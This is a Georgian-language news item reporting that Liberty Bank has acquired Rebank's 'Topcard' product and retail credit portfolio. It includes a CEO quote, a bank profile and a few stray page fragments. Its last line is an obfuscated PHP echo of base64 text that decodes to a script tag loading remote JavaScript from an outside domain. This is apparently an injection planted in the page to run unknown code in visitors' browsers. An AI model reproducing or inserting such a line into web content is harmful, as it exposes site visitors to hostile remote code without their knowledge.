celsiusi
ავერსი შნაიდერი

 ლიბერთიმ რებანკის პროდუქტი „ტოპქარდი“ და საცალო საკრედიტო პორტფელი შეიძინა. ახალი პროდუქტის ლიბერთის სისტემაში ინტეგრაციის პროცესი ეტაპობრივად, ორი თვის მანძილზე განხორციელდება.

დღეიდან ამ პერიოდის განმავლობაში „ტოპქარდის“ მომხმარებლები კვლავ ჩვეულებრივ მიიღებენ რებანკის საცალო მომსახურებას, ხოლო ორი თვის შემდეგ, დამატებითი ვიზიტის გარეშე, არსებული პირობებით ავტომატურად ისარგებლებენ ლიბერთი ბანკში.

„ლიბერთის გუნდმა მივიღეთ მნიშვნელოვანი გადაწყვეტილება და შევიძინეთ რებანკის საცალო პროდუქტი „ტოპქარდი“, რაც ლიბერთის უნივერსალურ ფინანსურ ინსტიტუტად ჩამოყალიბების გზაზე კიდევ ერთი სტრატეგიული ნაბიჯია. ლიბერთის საცალო მიმართულება დინამიკურად ვითარდება, ძლიერდება გუნდი, იქმნება მომხმარებლის საჭიროებებზე ორიენტირებული ახალი პროდუქტები და შეთავაზებები, რომელთა შორის „ტოპქარდი“ მნიშვნელოვან ადგილს დაიკავებს. მივესალმები ახალ მომხმარებლებს, რომლებიც სულ მალე შემოგვიერთდებიან და მადლობას ვუხდი ამ პროცესში ჩართულ ლიბერთისა და რებანკის გუნდის თითოეულ წევრს“, - ლიბერთი ბანკის გენერალური დირექტორი ბექა გოგიჩაიშვილი.

ლიბერთის შესახებ: ლიბერთი ქვეყნის ერთ-ერთი უმსხვილესი კომერციული ბანკია, რომელიც 1,7 მილიონზე მეტ ფიზიკურ პირს და 50 000-ზე მეტ მცირე და საშუალო ბიზნესს ემსახურება. ბანკის აქტივები 3 მლრდ ლარს შეადგენს და დასაქმებულია 4,500-ზე მეტი თანამშრომელი. ლიბერთი ქვეყნის მასშტაბით წარმოდგენილია ყველაზე ფართო ქსელით - 360-ზე მეტი მომსახურების ცენტრით, 632 ბანკომატით, თვითმომსახურების და POS ტერმინალებით საქართველოს ყველა რეგიონსა და მუნიციპალიტეტში. განვითარებული ინფრასტრუქტურის გარდა, როგორც ფიზიკური, ასევე იურიდიული პირებისთვის ხელმისაწვდომია თანამედროვე ციფრული სერვისები და დისტანციური მომსახურება.

286
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");